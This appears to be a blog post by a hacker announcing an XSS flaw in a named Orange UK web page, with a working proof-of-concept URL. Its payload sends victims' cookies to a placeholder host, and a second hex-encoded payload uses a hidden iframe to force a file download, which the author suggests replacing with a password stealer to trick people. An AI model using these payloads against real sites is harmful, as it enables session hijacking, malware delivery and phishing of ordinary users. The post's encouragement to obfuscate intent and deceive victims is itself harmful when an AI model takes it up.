Orange Vulnerable to XSS and phishing

                       ____                               _    _ _  __
                      / __ \                             | |  | | |/ /
                     | |  | |_ __ __ _ _ __   __ _  ___  | |  | | ' /
                     | |  | | '__/ _` | '_ \ / _` |/ _ \ | |  | |  <
                     | |__| | | | (_| | | | | (_| |  __/ | |__| | . \
                      \____/|_|  \__,_|_| |_|\__, |\___|  \____/|_|\_\
                                              __/ |
                                             |___/
                                            # TinKode & La Magra@ Romania

XSS – [Cross-Site Scripting]
Informations:
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which enable malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy…

More here: [ XSS ]

I just found a XSS vulnerability in website.orange.co.uk website.
Through this vulnerability, an attacker could inject HTML or JavaScript code which may lead to cookie stealing.

Proof of Concept:

Link:

http://website.orange.co.uk/index.php?module=reminder&submode=sendpw&l=en_UK_orange_uk&email="><iframe height="0" width="0" frameborder="0" src=javascript:void(document.location="http://steal-site.com/cookie.php?cookie="+document.cookie+"&iframe")></iframe>

c0de:

"><iframe height="0" width="0" frameborder="0" src=javascript:void(document.location="http://steal-site.com/cookie.php?cookie="+document.cookie+"&iframe")></iframe>

We can encode the malicous code in base64, hex, etc in order to hide our intentions! :)

Another example for this vulnerability is phishing! :D

As everyone knows, there are programs called stealer which can steal all saved passwords from your browser.

I picked a executable program (winamp in our case) for a demonstration.

Link to download winamp: http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe

The malicious code:

"><iframe height="0" width="0" frameborder="0" src="http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe"></iframe>

Encoded in hex will become:

http://website.orange.co.uk/index.php?module=reminder&submode=sendpw&l=en_UK_orange_uk&email=%22%3e%3c%69%66%72%61%6d%65%20%68%65%69%67%68%74%3d%22%30%22%20%77%69%64%74%68%3d%22%30%22%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%22%30%22%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%64%6f%77%6e%6c%6f%61%64%2e%6e%75%6c%6c%73%6f%66%74%2e%63%6f%6d%2f%77%69%6e%61%6d%70%2f%63%6c%69%65%6e%74%2f%77%69%6e%61%6d%70%35%35%37%32%5f%6c%69%74%65%5f%65%6e%2d%75%73%2e%65%78%65%22%3e%3c%2f%69%66%72%61%6d%65%3e

Replace the winamp link with another one(eg: a stealer) and you can trick a lot of people.

Note: This isn’t the only vulnerability which I found in : orange.co.uk
#Tinkode

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s